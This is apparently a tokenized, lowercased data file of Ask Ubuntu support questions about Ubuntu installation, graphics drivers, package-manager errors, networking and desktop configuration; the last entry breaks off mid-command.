306380	kubuntu 13.04 live usb works , graphics crash when installed	i 'm trying to install kubuntu 13.04 on my laptop from a live usb . the live usb works fine , graphics , wireless etc . it all works . installation works as well , but when i try to start the newly installed kubuntu from the hard drive i first get a flashing kubuntu logo , then just flickering lines , mostly white . from that point i ca n't switch to a terminal or do anything other than the magicsysrq combo . the same thing happens if i start with xforcevesa . if i start with nomodeset or radeon.modeset=0 , i just end up with a black screen where the magicsysrq combo does n't work , but a quick press on the power button shuts the computer off immediately which tells me the kernel crashed . the computer is a dell studio 1555 laptop with an ati mobility radeon hd 4570 graphics card . i have reinstalled without updates so that only packages from the live usb were installed . how can the live usb work , but not the installed version ? thank you for any help ! edit : to clarify , i never get past the kernel loading after installing to the hard drive .
306382	gnu mailutils configuration to directly operate on maildir ?	i 'd like to configure the gnu mailutils mail program so that it operates on an already existing maildir directory . currently my mailutils.rc looks like this : mailbox { mailbox-pattern `` maildir : ///home/ $ { user } /maildir '' ; mailbox-type maildir ; } this allows me to read mail from that folder , but nevertheless , the mail program always moves all opened mails to /home/ $ { user } /mbox . is there a way to tell mail to keep the files at their original position ?
306387	password not accepted . how to reset ?	i installed ubuntu 12.04 lts today . i had kept my password as `` 1317kmb '' .on restarting and updating it asks for password . when i use the above mentioned password , it does not accepts . i do n't know why ? how can i reset password . all my enthusiasm of using ubuntu has been lost by this .
306393	how do i install the dpkg-dev package ? requires ubuntu iso	please assist me in installing dpkg-dev . it requires me to insert `` ubuntu 12.04.1 precise pangolin i386 '' . i did download and burn the image onto a disk . repeated the process..i.e . type sudo apt-get install dpkg-dev inserted the above mention disc as required pressed 'enter ' as required , but that 's where nothing happens and my problem begun.. any advice would be appreciated or please send me the exact image of the above mentioned ubuntu image/iso file .
306399	error installing synaptic	when i was install synaptic package manager by typing sudo apt-get install synaptic i got this errors reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ir.archive.ubuntu.com_ubuntu_dists_raring_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . please tell me what i do ?
306400	evolution not starting after apt-get upgrade	i have tried several searches to see if anyone has experienced the same problem . since i updated my pc this morning evolution will not start . i can view the process by using top but it uses 0.2m of memory and 0 % cpu . it does not change and refuses to start the gui . i am running ubuntu 12.04 with evolution 3.2.3 . i have rebooted several times and killed and restarted the process several times with the same result . when running evolution with the debug=file.bug option i get the following : ** ( evolution:3401 ) : error ** : timeout was reached
306405	graphics card not displaying on ubuntu 12.04	what i initially wanted to do was to install steam . for that , it seems like i need to install the proper graphics driver for my system . my laptop is asus k55v . it has got an nvidia geforce gt 630m i suppose . so , i checked the system details and it was showing graphics driver unknown . i googled for the solution to this and got to this page : how can i get my graphics card to be recognized in system info ? so , i installed mesa-utils and rebooted . but now it shows this : can i get some help please ? also , i am a linux noob . so , please give the detailed explanation if possible . thanks .
306410	ubuntu ppc version livedvd not booting on powerbook g4 15 '' ... what to do ?	my 15 '' powerbook g4 ( al ) was getting too old and mac osx lion installed by default on it was too boring to use as my daily driver.. so.. i decided to install ubuntu 13.04 powerpc version on it.. i downloaded the livedvd image , burned it to a disc and quickly tried to boot it on my powerbook.. i got the yaboot prompt.. i directly pressed enter.. ubuntu boot screen appeared with `` ubuntu 13.04 '' text and four running dots.. and then after two to three flickers , i got a mouse pointer.. then highly unusable low graphics ... with crazy grid-like grey dots and all ... i pressed ctrl+alt+fn+f1 ... got a terminal screen ... typed `` lspci '' and got the following output : 0000:00:0b.0 host bridge : apple inc. intrepid2 agp bridge 0000:00:10.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv350/m10 [ mobility radeon 9600 pro turbo ] 0001:10:0b.0 host bridge : apple inc. intrepid2 pci bridge 0001:10:11.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) 0001:10:14.0 cardbus bridge : texas instruments pci1510 pc card cardbus controller 0001:10:15.0 usb controller : nec corporation ohci usb controller ( rev 43 ) 0001:10:15.1 usb controller : nec corporation ohci usb controller ( rev 43 ) 0001:10:15.2 usb controller : nec corporation upd72010x usb 2.0 controller ( rev 04 ) 0001:10:17.0 unassigned class [ ff00 ] : apple inc. keylargo/intrepid mac i/o 0002:24:0b.0 host bridge : apple inc. intrepid2 pci bridge 0002:24:0d.0 unassigned class [ ff00 ] : apple inc. intrepid2 ata/100 0002:24:0e.0 firewire ( ieee 1394 ) : apple inc. intrepid2 firewire 0002:24:0f.0 ethernet controller : apple inc. intrepid2 gmac ( sun gem ) i didnt know what to do.. so tried with `` live-nosplash '' yaboot parameter.. i got sequences of text ... then got a display with too less colors ... but looks as if a light ray is emerging out from the bottom left corner ... but again unusuable ... then again could get a terminal as before ... then for my 3rd attempt.. tried `` live video=ofonly '' parameter ... i got a blue colored boot screen with running dots.. but proper ubuntu logo this time ... booted up to a black screen ... when i increased the brightness , i got `` the system is running in low-graphics mode '' dialog box ... colors were proper this time ... after clicking on ok.. i got options to configure graphics manually ... as i havent done this before , i dont know what to do ... but again was able to get a terminal screen as before ... then for my 4th attempt.. tried `` live nomodest '' parameter ... got results as i got in my 1st attempt ... terminal still worked.. i 'm out of options ... please help me out here ...
306412	how can i setup my touchpad multi-finger tapping functionality ?	i 'm trying to setup my multi-finger tap in the following way : single finger - left click two fingers - middle click three fingers - right click what i currently have is : single finger - left click two fingers - right click three fingers - none i 've looked up several questions here on ask ubuntu , as well as the ubuntu wiki on the subject ( plus some general google searching ) , but could n't find anything to help me out . i know of xinput , but i do n't know what to change there and how . if anyone is able to point me to the right direction , i 'd be grateful and award him with 25 shiny rep points , a large green tick mark , and some cookies .
306413	ubuntu 12.10 error in select and install software	i keep having this error msg and i dont know what is wrong : select and install software installation step failed an installation step failed . you can try to run the faling item again from the menu , or skip it and choose something else . the failing step is : select and install software and then the main menu appears what should i click or do to go the next step which is grub boot loader ?
306420	how to install multiple versions of libreoffice ?	because of a problem reported here , possibly a bug , i have to use libreoffice 3.5 . but i would like to keep an eye on the latest version , which might even solve that problem . i would like to use the latest 4.x version beside 3.5 . ( not in a virtual box or in wine ) that is : i have already installed 3.5 from a deb package . how to install now the 4.x version without conflicts ? i imagine i could uninstall 3.5 and put 4.0 in place and then try to install 3.5 separately . but how ?
306425	add a personal package archive ( ppa )	i can n't add a personal package archive ( ppa ) to software sources when i write ppa : location . and click add source the buttone do n't worke what should i do ?
306434	upstart job does n't die correctly	i 'm making a simple upstart daemon . following the upstart documentation [ 1 ] i make the conf script : description `` super daemon '' author `` bastian baltasar bux '' start on started dbus stop on runlevel [ 06 ] expect fork exec /usr/bin/my-daemon the script /usr/bin/my-daemon is a bash that call a python . the python script log information in a /var/log file . on that python script , i only make a fork . but when i check the forks like says in the upstart doc [ 2 ] , the method says that i do twice forks . with that all , the start job is executed correctly , but the pid showed with the upstart my-daemon status is n't the same that is in the log file . the error appears when i try to stop doing status my-daemon stop . that command does n't end , i must to finish with crtl-c . i tried to change the expect fork to expect daemon but service stop does n't ends neither . when could be the problem ? [ 1 ] http : //upstart.ubuntu.com/cookbook [ 2 ] http : //upstart.ubuntu.com/cookbook/ # id158
306441	how to remove folding application when pressing alt-tab in 13.04 ?	i know that this question has a very similar one but i just ca n't found the application switcher that basharat sial talked about . i install unity-tweak-tool but could n't find there neither such option .
306443	xubuntu - command/shortcut to hide all notifications	is there a command/shortcut avaiable to hide all popped-up notifications ? some of my scripts produce notifications which dont auto-hide , you have to click them . i 'd like to have a keyboard shortcut instead of having to click each and every one .
306444	standard install procedure for php 5.3 without suhosin ?	is there a standard way to install php 5.3 without suhosin ? how would doing so affect tracking of routine updates for precise ? if it 's going to make life complicated now or in future then i might just leave it there .
306445	re-installing squid proxy	i have installed squid proxy in my ubuntu system . something went wrong in the configuration file . so i need to re-install squid . what is the command to remove squid ? what is the command to install squid again ? how can i configure squid to allow only certain ip to access facebook ?
306450	system log not perpetually scrolling ?	rsystemlogd is installed - when running - then system log is scrolling too with kernel.log and logging of eth0 . now it happens that system log is not scrolling despite of that rsystemlogd is still running in background . do i need to configure system log as daemon ? then it would run and scroll perpetually ? why is system log stopping ? ( sorry have forgotten : it is ubuntu 12.10 here up-to-date )
306452	if i chose `` replace windows with ubuntu '' , do i lose the other partition too ?	i am a newbie in linux . i wanted to install ubuntu to my desktop . i currently have two partitions , windows 8 in installed on one , and i have some important files in another partition . while installing ubuntu , if i chose `` replace windows 8 with ubuntu '' , do i lose the other partition too ? and are there other ways to leave the other partition as it is , and install ubuntu in the partition where windows was installed .
306461	share home files but not preferences	i would like to know if it is possible to make a symbolic link between the home folders of two users so they both have access to documents , audio , photos , etc ... read and write , but actually have their own physical home folders for personal preferences ... here is why i want this : i am running ubuntu gnome on my macbook 13 '' . i sometimes run my 50 '' hdtv as a monitor , so of course my visual preferences ( text scaling , etc . ) is different from when i use my laptop screen . i would like to know if i can create a new user , symbolic link the personal files so i can access everything from both users , but log in to different users for different visual setups . thanks !
306466	can not change input-language ( using alt+shift ) over nx session	i ca n't seem to change the language over an nx session . i am using ubuntu 12.04 and locally i just use alt+shift to alter language . when i connect to a remote server using nx , i can not use this key combination to alter the language i type at the far end . i am sure the nxserver is working - used to use it for a long time . i changed my local os though ( was running mint 12 , and now i 'm running ubuntu 12.04 ) . so i had to reinstall nomachine 's nx , and now it is not working . any clues ? i tried shift-caps and shift-space but that does n't work .
306467	/usr/lib/i386-linux-gnu/libstdc++.so.6 : version `glibcxx_3.4.19 ' not found	i 'm building a program in a vm then deploying to another machine . this has been working for some time . today i 've started receiving this error message when i attempt to execute my program : /usr/lib/i386-linux-gnu/libstdc++.so.6 : version `glibcxx_3.4.19 ' not found both machines are running the same kernel version , and all packages are up to date : $ uname -a linux darwin7 3.8.0-23-generic # 34-ubuntu smp wed may 29 20:24:54 utc 2013 i686 i686 i686 gnu/linux how might i investigate and repair this issue ?
306469	how can i prevent a user from changing their password ?	i want to prevent a user from changing their own password . additionally , if possible , i want to prevent them from changing it via sudo .
306483	when i try to start lampp the terminal says that it only works on 32bit	i already have the ia32-libs installed and i used this code sudo apt-get install ia32-libs anyone have any suggestions on what i 'm doing wrong ?
306484	what 's the correct format of a forward zone in bind	can someone please enlighten me in setting up the correct format of forward zone . $ ttl 604800 foo.com . in soa foo.com . admin.foo.com . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; foo.com . in a dns.foo.com . www in a 192.168.1.54 dns in a 192.168.1.5 this part foo.com . in a dns.foo.com . should i replace the dns with my dns server hostname ? cause ive seen others use ns1 or dns ? so if my dns hostname is test , id be using test.foo.com . ?
306486	lubuntu wo n't start anymore after completely removing ubuntu-desktop	i installed ubuntu-desktop , kubuntu-desktop and xubuntu-desktop on my lubuntu . i wanted to remove them and found this . i first used the command to remove ubuntu-desktop . while running it , i noticed that it was also deleting kde packages . the command took a while and i had to go away , so i locked the screen ( and it used the lock screen from ubuntu-desktop ) . after 2 hours i came back and pressed a button to wake from standby . after that it reacted to nothing so i had to do a forced shutdown . and now it wo n't start anymore ( black screen ) . i can still get into windows and safemode . i tried safemode , enabling network and running apt-get install lubuntu-desktop , but it looks like it already is there . i tried dpkg and apt-get autoremove and doing apt-get install lubuntu-desktop again , but it still looks like it already is there . when i reboot now i do get the lubuntu logo but after that , black screen again . i also tried removing lubuntu-desktop and installing it again but that did n't help either . what should i do ? ( except reinstalling )
306487	install php 5.3 on ubuntu 13.04	how i could install old php version on ubuntu 13.04 ( prefer verson 5.3.3 ) ? i appreciate any help .
306493	limited resolution options for external monitor	ubuntu will only allow 1024x768 or 800x600 resolution options for my external monitor , an hp 2159m ( which supports 1920x1080 ) . the laptop 's built-in monitor works fine . i 'm running ubuntu 12.04 , and i 'm new to ubuntu . i 've check the hp site , but they only have windows drivers for this monitor . if it 's any help , my laptop also has windows 8 installed and the external monitor works correctly in 1920x1080 with the generic windows driver . any help appreciated ! just let me know if you need more info .
306497	failing installation of valgrind	i am trying to learn c with the guide , learning c the hard way , and in exercise 4 i have to download the program valgrind , i do this with this command as shown in the book : curl -o http : //valgrind.org/downloads/valgrind-3.6.1.tar.bz2 but when i do this , the terminal goes nuts and print this : m'þ¯àñá¿t0k©äâorbâ¡ 'úuéú¢ã $ ¼ æuµ1d5yq�kn�� < �cݖ� @ p & j�� ) ju '' d4��a�����5p�m�idٲs�� > �cq�srq1d��kw . 9�� '' ��jx� '' ! �f�w : �v�d�� ! ���|����� $ +� b�t�0ck0��n $ �9�er��g�in�wp���q� ��϶�l , ��z勩��p� @ ����^ ���1��öû_ % cß÷ ; íx:3àrpd.j ! è '' ñìgíÿ¾èýoµé ) ¨emð þudtù¶bà'z ) pèel ) ailbp0éc×-+¤ñ1lr ß ; ufçïlmùi8 cvn8áäítaoq¬ð±làä´ öèvhdáä´4¤ ) jò.çèãìàð ; âr�fi��r & � '' �^��r % s���pãõvö-véxxfm8ãuixxødtqè4¥hâê¢dlw+c $ ap & '' åaâ & l©¢ '' ­fyamaudä6t¨faeìk®bðà¸§kÿreð & e9þé ? ) ¹ú¯bk åóêå ! üói°p¤ r¥q ) ¡ ) r* ( ä0ðt¹ªæðîü8ý ìü & àð¿hb¦íðñ.f0ü3üdpb'í´ # åpcì»nëv³åý & �x� { 8�� ; �~kz� & ��gd� { �h� ; ` # �6���m� $ �b��z1�7rb��3���6l��crd �a�a�0 # ĸ�i8ޛ [ �� ) ��ά+�΢y��� ; 7��g ) �d� ( ��oo� [ � ���c�� % ! t�pms ! i @ �sj4�ҭ+er�.� iãñü ' # jôe3¶'h : eõî p ! ��l h\��3.01��mo�off���� �mc : �a�l�ma�8 % � [ |���'s�e @ �� '' u @ 0p�p����h�� ) 79�ư§¡ã=èf6åñ²ïè # ô�-���i0�t�a|y� ·«7÷ßduå£f +¤ä $ wäþ8½ ! ñ'öä.l¤è ü.å0ä¶áªáî '' % ck $ joqü z ( ½ & uëøïä×fs3 çg øiüòèz-j¢ $ aõ'æ/÷ ? = òûà ? ­+ 5eei9î÷ü¯³ëüjfi1©dìsçxû62é®pnèëmr¡ $ lèeänbáafp´¹z3· & jè©jxæ9k2 , àà % ä päuäj¡sl # br/ '' 0¨ø $ îàkyµ¬0h i ¿ 8à fþwú ; ÿf­ëîþ ! áh < vpu 4ë©¡qóeézü¨¹.áíð+ôæó ý/ôüáøgüù¬i_fä ) rµf ? ³j öø»ìëï_ç­ & º´ $ ä¾èaà äað-÷yóðàaû ç¾vå 4ro ýør½ä1 % % -4 ! bkæ0èÿoÿ¯ðÿùÿ ? üû ? ôøßöÿÿ÷»ÿüßòÿ÷ÿùÿªï¯ãÿïþ ? üÿþöþ : mÿýÿ¿îÿãÿÿüßöoçÿß÷7þý¿û¿ðýtýÿäÿèû»¿ù > & ßþ ? øÿòÿçùÿýètáäaýñ ÿßõ $ æõ ¤üâhûÿôú¨2âõe dë­¦¬pýpÿt ë7/ùôpd # ücøjm ( ïòc d e1þqçúöáôoð·ÿúðtä < z¤ , ò ! õ©¹mg����ublk if0� f���3z��إ�*�s��`�q� $ 8dqqk�r� : *��f� ! ��b�����lmfcfz� ! � & jk � a�b % ��x\mqz [ ���l�c��c� , f '' c @ �n ! v������* [ �l % ( �� '' �84��\������� �� hvem02 @ hp-computer : ~ $ ^c ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c hvem02 @ hp-computer : ~ $ ^cþxaæz µò ) mup¬ýì¨=òc²mæâ¹u ; îçc®ïæðaáõ×hvem02 @ hp-computer : ~ $ µuaôç öß ! .ækð # äèt < 4 % çhø ; �ef� , irp�9d�m % ��p�td� , kv�w } o� 62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c62 ; 9 ; c what is going on here , and how can i fix it ? side note : i 'm new to ubuntu .
306499	logon screen resolution on two displays ( intel hd graphics )	i have a laptop with intel hd graphics and resolution 1366 x 768 ( d.1 ) and a display with resolution 1280 x 1024 ( d.2 ) . when i connected it via vga while in my desktop it worked all right , but after reboot there was a problem with a resolution . in logon-screen my laptop-display ( d.1 ) had a resolution of the second display ( d.2 ) . i logged on and saw that while loading there was a half of the picture was on d.1 and a half on d.2 , then it was all right again , but after reboot i had on both displays a resolution of d.1 . so it switches without any action by me . how can i do something with it ? i have ubuntu 13.04 ( sorry for grammar , i 'm just learning english )
306506	trouble with dual booting on a samsung laptop	i am currently using a samsung np355v5 laptop ( amd a6 processor with hd7520g integrated graphics ) and i am trying to dual boot ubuntu 12.04 with windows 7 . i ideally do n't want to use wubi because i will doing a lot of file access programming which i am told is a fair amount slower with wubi . so my problem is that when i install ubuntu 12.04 , the grub does not seem to overwrite the windows boot and so it still appears in the bios boot menu which has never happened with any other system i have used . this also means that for some reason windows does not appear in the grub boot menu . it does however show in /boot/efi/ but i ca n't translate this to the grub boot menu . os prober does not see windows . i would prefer having it in the grub boot menu because i frequently use both os and booting from bios can be a bit of a nightmare sometimes . sorry if i missed any information out and thanks for the help in advance ross
306511	no internet connection , but have signal in wifi	i can not access yahoo.com , google etc in my browser , but i have signal in my wifi , how can i access the internet again ? please can you tell me how to configure and solve my problem , thanks
306514	i need to know how to boot ubuntu on an existing windows xp partition	i have an old pc running on windows xp . when i got it , i partitioned the hard drive . i need to know how to install ubuntu on that particular partition , since i have almost no space on my other drive .
306519	3g usb modems not working in ubuntu 13.04	what happened to ubuntu that it hardly support any type of 3g usb modem , it require a lot of googling to get the modem work . is there any permanent solution to this problem in future releases gaurav bhambri kubuntu 13.04 delhi india
306523	using source vs bash commands	test.sh mkdir test echo $ 1 echo $ 2 it appears that following two commands do the same things . are they the same ? if not , how could i alter my example to show the difference ? cat test.sh | bash -s hi bye source test.sh hi bye
306526	shortcut key to shutdown pc in ubuntu 12.04	what is the shortcut key to shutdown the computer for ubuntu 12.04 ?
306529	skype video feeds not showing	skype video feeds show up as a green box . the webcam is a microsoft lifecam but that should'nt matter because the camera works in cheese webcam both and the person i am skyping can see me . i thought it might have something to do with video codecs or something . help ?
306533	how to give execute permissions to a drive on steam ?	i even tried some answers but i am a newbie at ubuntu . i had no idea of what was everyone talking about . so please do n't consider this a duplicate . i just need an easy how-to .
306535	where is the `` copy video dvd '' function on ubuntu 12.04 totem 3.0.1	there was a `` copy video dvd '' option in dropdown in ubuntu 11.04 totem 2.32.0 . how do i get this back in ubuntu 12.04 , totem 3.0.1 ?
306538	ubuntu and recoveries	does ubuntu touch overwrite a custom recovery ( specifically cwm ) ? i have not installed ubuntu.on my phone yet due to the fact that ubuntu touch is still a work in progress for the atrix 4g thanks for all your help theandroiddude
306540	how can i force terminals to be at least a certain size ?	i 'd like to prevent any of my terminator terminals from being smaller than 80x24 . that is , i 'd be prevented from resizing a terminal to below that size , and if i tried to split a terminal that would be too small , either the existing terminals would be shrunk to fit or the parent and child terminals would be moved to a new window . i 'm willing to change terminal programs if needed , although a good tiling solution like terminator 's is preferable .
306543	how do i troubleshoot boot problems when stuck at the ubuntu splash screen ?	i was tweaking some settings on my ubuntu 12.04 install . specifically i was altering the default color scheme of the terminal , following these instructions now whenever i boot ubuntu , i get stuck in the purple screen that says `` ubuntu '' with the moving dots . if i hit enter ubuntu booting continues . i 'm not asking about solving my specific problem ( which is definitely caused my be doing weird things ) instead i 'm asking how would i go about digging into what 's going on at boot ? what logs should i look at ? what kind of thing should i look for ? how would i troubleshoot this issue ? i would like to `` learn how to fish '' and go figure out what is probably a stupid issue . i tried the boot repair utility , however that does not appear to do the trick . boot repair appears to be focussed more on grub , which is functioning fine .
306547	update manager not updating	every time i run update manager , i get a message saying '' the package system is broken if you are using third party repositories then disable them , since they are a common source of problems . now run the following command in a terminal : apt-get install -f '' i run this command in a terminal , but nothing happens ... this started happening since i installed a calender plugin for thunderbird . is this the cause ?
306557	vlc made it impossible to install or delete	this is what it says reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : rpm : depends : librpm2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmbuild2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmio2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmsign0 ( > = 4.9.0 ) but it is not going to be installed depends : rpm2cpio but it is not going to be installed depends : rpm-common ( = 4.9.1.1-1ubuntu0.1 ) but it is not going to be installed vlc-nox : depends : libvlc5 ( > = 2.0.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i type the apt-get -f install this is what i get next bilal @ bilal-aspire-8930 : ~ $ sudo apt-get -f install [ sudo ] password for bilal : sorry , try again . [ sudo ] password for bilal : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libvlc5 the following new packages will be installed : libvlc5 0 upgraded , 1 newly installed , 0 to remove and 57 not upgraded . 4 not fully installed or removed . need to get 0 b/50.8 kb of archives . after this operation , 147 kb of additional disk space will be used . do you want to continue [ y/n ] ? y e : sub-process gzip returned an error code ( 1 ) e : prior errors apply to /var/cache/apt/archives/libvlc5_2.0.5-0ubuntu0.12.04.1_i386.deb debconf : apt-extracttemplates failed : no such file or directory ( reading database ... 171161 files and directories currently installed . ) unpacking libvlc5 ( from ... /libvlc5_2.0.5-0ubuntu0.12.04.1_i386.deb ) ... dpkg-deb ( subprocess ) : failed to read on buffer copy for failed to write to pipe in copy : input/output error dpkg-deb : error : subprocess paste returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libvlc5_2.0.5-0ubuntu0.12.04.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/libvlc5_2.0.5-0ubuntu0.12.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) bilal @ bilal-aspire-8930 : ~ $
306564	switch between microphones in ubuntu 13.04	i want to record sounds from my piano . for this i have a jack cable that connects the piano with my laptop . my laptop has an built-in microphone that i do n't want to use it when recording from my keyboard . so , i connected my piano with the laptop by jack cable . i have the following settings in input on sounds : if i connect my microphone from my phones the `` internal microphone '' changes to `` microphone '' , like in the screen shot : this will capture the sounds from my phones microphone . my question is : how can i set the latest setting when using my piano ? i want to capture sounds from my piano , using the jack cable . maybe it 's important to know that i can listen the sounds from piano in live mode , but i ca n't record them . update : pactl list sources outputs this in the ports : case 1 piano is connected : analog-input-microphone-internal : internal microphone ( priority : 8900 ) analog-input-microphone : microphone ( priority : 8700 , not available ) case 2 an external microphone is connected : analog-input-microphone-internal : internal microphone ( priority : 8900 , not available ) analog-input-microphone : microphone ( priority : 8700 , available )
306566	12.04 lts keeps disconnecting from the internet ?	its really annoying , it disconnects every so often does anyone know how to fix this or has anyone had this problem ? description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation
306569	wacom bamboo fun pen & touch	i’m using a 12.10 with gnome desktop for now and just started to learn couple of things about it . i have a lenovo i5 with a nvidia geforce gt635m but because of numerous issues i use the default nouveau driver for it . i 'm planning on buying a new graphic tablet , i haven’t used one yet . i’m considering a wacom bamboo fun pen & touch small . i’m not a professional and i won’t need something very expensive in the first place and this seems like a good choice . my only experience with drawing until now was been pen and paper . did a short search on the forum and found couple of tips and advises about installing this thing . i guess i’ll try those when i’ll have the tablet in my hands . i just have a couple of questions before buying it : for people who are using it with ubuntu , would you recommend something else in this price range ? . from my little google research there are pretty good reviews for this model but i’m open to suggestions . does anyone have a complete set of instructions for installing it ( meaning something that will help me use all its features ? what app do you use for it , i have two or three apps that came with gnome but if there is something better you recommend i would like to hear about it ? i’m not a native english speaker so if there is something unclear or misspelled in my message i apologize .
306575	where can a beginner learn ubuntu game development ?	hi everyone i have n't had ubuntu for long but i feel it has more potential for game development than windows 8 ( do n't use it , it blows ! ) . on windows i used xna , but i wanted to have a development environment on ubuntu since i 'm not sure how to access art and music files from windows . so what frameworks ( engines preferably ) can i use for ubuntu game development ?
306580	ubuntu 11.10 wont ' upgrade to firefox 21	i 'm running ubuntu 11.10 on a system76 laptop , and i ca n't seem to upgrade my firefox to v21 . apt-get update , install , and upgrade firefox all return without making any upgrades . synaptic is the same . any help would rock !
306582	how do i configure lvds+displayport+displayport using an nvidia chipset ?	i have a thinkpad t520 with nvidia optimus . for my own sanity , i 've set it ( in the bios ) to use 100 % discrete graphics , so the intel graphics are never used . there are 3 displays : the laptop 's built in lcd , plus two dvi connections via a port replicator . the problem is , when i use either the built-in monitor configuration tools , or nvidia-settings to configure my display , i 'm not able to get all 3 displays to show up . nvida-settings specifically gives me this message : metamode 1 of screen 0 has more than 2 active display devices . i 'm not sure what that means . this is with an nvidia gf119m [ quadro nvs 4200m ] ( rev a1 ) , per lspci : 01:00.0 vga compatible controller : nvidia corporation gf119m [ quadro nvs 4200m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 21cf flags : bus master , fast devsel , latency 0 , irq 16 memory at f2000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 6000 [ size=128 ] [ virtual ] expansion rom at f3080000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia edit : output of xrandr : screen 0 : minimum 8 x 8 , current 3840 x 1080 , maximum 16384 x 16384 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 50.0 dp-0 disconnected ( normal left inverted right x axis y axis ) dp-1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 520mm x 290mm 1920x1080 60.0*+ 1680x1050 60.0 1600x1200 60.0 1440x900 59.9 1400x1050 60.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 dp-2 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 521mm x 293mm 1920x1080 60.0*+ 1680x1050 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1280x800 59.8 1280x720 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 59.9 dp-3 disconnected ( normal left inverted right x axis y axis ) dp-4 disconnected ( normal left inverted right x axis y axis ) dp-5 disconnected ( normal left inverted right x axis y axis ) another edit . this is the result of trying to use xrandr ( via arandr ) : $ xrandr -- output vga-0 -- off -- output lvds-0 -- mode 1920x1080 -- pos 0x0 -- rotate normal -- output dp-5 -- off -- output dp-4 